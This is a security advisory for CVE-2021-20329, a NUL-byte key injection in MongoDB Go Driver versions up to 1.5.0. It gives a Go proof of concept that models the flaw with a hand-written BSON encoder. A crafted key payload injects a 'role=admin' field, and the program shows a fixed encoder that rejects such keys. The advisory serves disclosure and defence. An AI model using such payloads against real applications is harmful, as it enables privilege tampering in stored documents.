PT-2021-13888 · MongoDB · MongoDB Go Driver
Published
2021-06-10
·
Updated
2025-11-25
·
CVE-2021-20329
CVSS v3.1
6.8
Medium
| Vector | AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N |
Name of the Vulnerable Software and Affected Versions:
MongoDB Go Driver versions prior to and including 1.5.0
Description:
When marshalling Go objects into BSON, the MongoDB Go Driver did not validate that keys are well-formed BSON cstrings, which must not contain the NUL byte (0x00). A key carrying an embedded NUL was written into the document verbatim; a receiver stops reading the key at the first NUL and interprets the bytes that follow as further BSON elements. A malicious user who controls a key (for example, a map key or field name derived from request data) could therefore inject additional fields into the marshalled document. Only applications that build BSON keys from untrusted input are exposed; BSON string values are length-prefixed and are not affected by this issue.
Recommendations:
For MongoDB Go Driver versions prior to and including 1.5.0, update to a version later than 1.5.0 (1.5.1 was the first release to reject keys containing NUL bytes).
If updating is not immediately possible, do not let untrusted input choose BSON keys (struct field names, map keys, bson.D or bson.M keys), or reject any key that contains a NUL byte (0x00) before marshalling.
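The following program is an added example, not code from the MongoDB Go Driver or from the original advisory. It models the mechanism in the description and the check in the recommendation with a minimal hand-written BSON encoder and decoder, so it runs with the Go standard library alone. The Field type, the function names and the CraftedKey payload are constructed for this illustration; the encoding follows the BSON specification (type byte, NUL-terminated cstring key, int32-length-prefixed string value, int32 total length, NUL document terminator).

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
)

// Field is one key/value pair of a flat document with string values. Only the key
// is written as a NUL-terminated cstring, so the key is where an embedded NUL hurts.
type Field struct{ Key, Value string }

// ErrNULInKey is what the checked encoder returns for a key that is not a valid cstring.
var ErrNULInKey = errors.New("bson: key contains a NUL byte")

// marshal encodes fields as one BSON document of string elements. checkKeys=false copies
// key bytes verbatim (modelling the pre-fix driver); checkKeys=true rejects a key with a NUL.
func marshal(fields []Field, checkKeys bool) ([]byte, error) {
	var body bytes.Buffer
	for _, f := range fields {
		if checkKeys && strings.IndexByte(f.Key, 0x00) >= 0 {
			return nil, fmt.Errorf("%w: %q", ErrNULInKey, f.Key)
		}
		body.WriteByte(0x02)    // element type: UTF-8 string
		body.WriteString(f.Key) // cstring key ...
		body.WriteByte(0x00)    // ... and its terminator
		var n [4]byte           // string value: int32 length incl. trailing NUL, bytes, NUL
		binary.LittleEndian.PutUint32(n[:], uint32(len(f.Value)+1))
		body.Write(n[:])
		body.WriteString(f.Value)
		body.WriteByte(0x00)
	}
	body.WriteByte(0x00) // document terminator
	doc := make([]byte, 4+body.Len())
	binary.LittleEndian.PutUint32(doc, uint32(len(doc))) // total length prefix
	copy(doc[4:], body.Bytes())
	return doc, nil
}

// Decode walks a document the way a receiver does and returns the string elements
// it sees, insisting that they exactly fill the declared length.
func Decode(doc []byte) (map[string]string, error) {
	if len(doc) < 5 || int(binary.LittleEndian.Uint32(doc)) != len(doc) || doc[len(doc)-1] != 0x00 {
		return nil, errors.New("bson: bad document framing")
	}
	out := map[string]string{}
	p := 4
	for p < len(doc)-1 && doc[p] != 0x00 {
		if doc[p] != 0x02 {
			return nil, fmt.Errorf("bson: unsupported element type 0x%02x", doc[p])
		}
		p++
		end := bytes.IndexByte(doc[p:], 0x00) // the receiver's key ends at the first NUL
		if end < 0 {
			return nil, errors.New("bson: unterminated key")
		}
		key := string(doc[p : p+end])
		p += end + 1
		if p+4 > len(doc) {
			return nil, errors.New("bson: truncated string length")
		}
		n := int(binary.LittleEndian.Uint32(doc[p:]))
		if p += 4; n < 1 || p+n > len(doc) || doc[p+n-1] != 0x00 {
			return nil, errors.New("bson: bad string value")
		}
		out[key] = string(doc[p : p+n-1])
		p += n
	}
	if p != len(doc)-1 {
		return nil, errors.New("bson: elements do not fill the document")
	}
	return out, nil
}

// CraftedKey is a constructed attacker payload for a key the application believes is
// "name". After the NUL the bytes continue as BSON: an empty value for "name", a whole
// element role="admin", and a header that the encoder's own NUL and value "alice" complete.
const CraftedKey = "name\x00" +
	"\x01\x00\x00\x00\x00" + // string of length 1 (just the NUL): name = ""
	"\x02role\x00\x06\x00\x00\x00admin\x00" + // injected element: role = "admin"
	"\x02displayName" // header the encoder finishes: displayName = "alice"

// Demo marshals the crafted field with both encoders and returns what a receiver
// decodes from the unchecked output, the decode error, and the checked encoder's error.
func Demo() (map[string]string, error, error) {
	fields := []Field{{Key: CraftedKey, Value: "alice"}}
	doc, _ := marshal(fields, false)
	seen, decodeErr := Decode(doc)
	_, checkErr := marshal(fields, true)
	return seen, decodeErr, checkErr
}

func main() {
	seen, decodeErr, checkErr := Demo()
	fmt.Println(seen, decodeErr, checkErr) // three elements, no decode error, ErrNULInKey
}
```

The unchecked encoder produces a document that is byte-for-byte valid BSON, so the receiver has no way to tell that `role` was never a field of the Go object; this is why the fix belongs in the encoder, where the key is still a single string and the NUL can be detected, rather than in the consumer. The same check is cheap to apply at the application boundary as a workaround before passing untrusted keys to any BSON marshaller.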
Affected Products
MongoDB Go Driver